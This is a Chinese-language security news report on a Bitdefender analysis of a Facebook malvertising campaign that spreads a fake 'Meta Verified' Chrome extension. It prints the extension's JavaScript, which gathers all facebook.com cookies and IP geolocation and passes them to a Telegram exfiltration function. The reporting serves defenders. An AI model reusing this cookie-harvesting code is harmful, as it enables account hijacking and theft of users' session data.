恶意行为者在 Facebook 上发起了一场复杂的恶意广告活动,强迫毫无戒心的用户安装虚假的“Meta Verified”浏览器扩展程序。
这些广告通过看似合法的视频教程进行推广,承诺无需支付 Meta 的订阅费即可解锁令人垂涎的蓝色验证勾。
实际上,该扩展程序旨在收集敏感用户数据,包括会话 cookie、访问令牌和 IP 地址。
通过利用 Box.com 等可信平台进行托管,攻击者可以确保高可用性并逃避简单的 URL 阻止防御,从而使骗局看起来既真实又无风险。
仔细检查后发现,广告附带的视频教程带有越南语威胁行为者的痕迹,其中的旁白和代码注释都是用越南语写的。
该扩展的代码虽然被笨拙地混淆并且可能是由人工智能辅助工具包生成的,但仍然可以有效地窃取数据。
Bitdefender 分析师发现,一旦获取有效的访问令牌,就会使用 Facebook Graph API 来查询商业帐户信息,从而使攻击者能够区分高价值的公司资料和个人帐户。
按照教程操作的受害者会在不知情的情况下授予扩展程序从 facebook.com 域读取和导出 cookie 的权限。
一旦安装,该扩展程序就会立即调用 exportCookies 函数,将每个 cookie 编译为格式化的字符串,然后将其传输到攻击者控制的 Telegram 机器人。
为了进一步个性化被盗数据,该恶意软件查询 https://ipinfo.io/json 以附加地理位置详细信息,从而增强其在地下论坛上的市场竞争力。
Bitdefender 研究人员指出,此扩展的变体包括可调节的刻度大小和位置参数,这表明可以通过最少的手动工作量自动生成新的活动资产。
模块化设计还支持 Chrome 启动时自动执行,即使用户禁用并重新启用扩展程序,也能确保持续收集数据。
深入探究感染机制
感染机制的核心在于恶意扩展的后台脚本,该脚本挂接到 Chrome 的 cookie API 中以提取会话令牌,而无需触发用户提示。
安装后(通过点击广告链接触发),扩展程序会chrome.cookies.getAll({ domain: "facebook.com" }, callback)收集 cookie。
在回调中,它构建有效载荷:-
async function exportCookies() {
chrome.cookies.getAll({ domain: "facebook.com" }, async cookies => {
const cookieString = cookies. Map(c => `${c.name}=${c.value}`).join(";");
const userId = cookies. Find(c => c.name === "c_user")?.value || "Unknown";
const ipInfo = await fetch('https://ipinfo.io/json').then(r => r.json()).catch(() => ({}));
const payload = `ID: ${userId}\nIP: ${ipInfo.ip || "Unknown"}\nCookies: ${cookieString}`;
sendToTelegram(payload);
});
}这种简化的方法绕过了许多基于端点的检测,而使用合法域进行托管和命令与控制则降低了快速删除的可能性。
安全团队应监控异常的 cookie 导出活动并实施严格的扩展审查,以防御此类工业化的恶意广告威胁。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
